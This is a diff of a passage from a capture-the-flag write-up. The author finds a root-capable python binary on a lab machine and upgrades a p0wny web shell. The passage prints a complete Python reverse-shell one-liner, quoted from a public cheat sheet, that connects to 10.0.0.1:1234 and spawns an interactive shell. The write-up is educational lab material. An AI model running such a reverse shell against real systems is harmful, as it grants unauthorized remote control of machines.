ChrisPritchard/ctf-writeups/09-its-october.md

 lrwxrwxrwx 1 root root      10 Mar 26  2019 /usr/bin/python3m -> python3.7m
 ```

-So...python can run as root.
+So...python3.7 rusn as root.
 Interesting...

 ## Improving my shell

-The problem with python is that python3.7 -c "import os; os.system('whoami')" returns "www-data" still.
+The problem was that `python3.7 -c "import os; os.system('whoami')"` returned `www-data` still.
 I thought that what this meant was that python drops priveleges with the -c command.
-This is **not true**, but I didn't discover that til later.
+This is **not true**, but I didn't discover that until later.

 What I thought I needed was to open python interactively, and my p0wny shell wouldn't let me do that.
 So how to upgrade?

 `nc` wasn't there, neither was `/dev/tcp`.
-I had a python obviously, so I used a oneliner from here: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+However, I had python obviously, so I used a oneliner from here: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet.
+Specifically (replacing the IP and port as appropriate):

-Specifically:

 ```
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'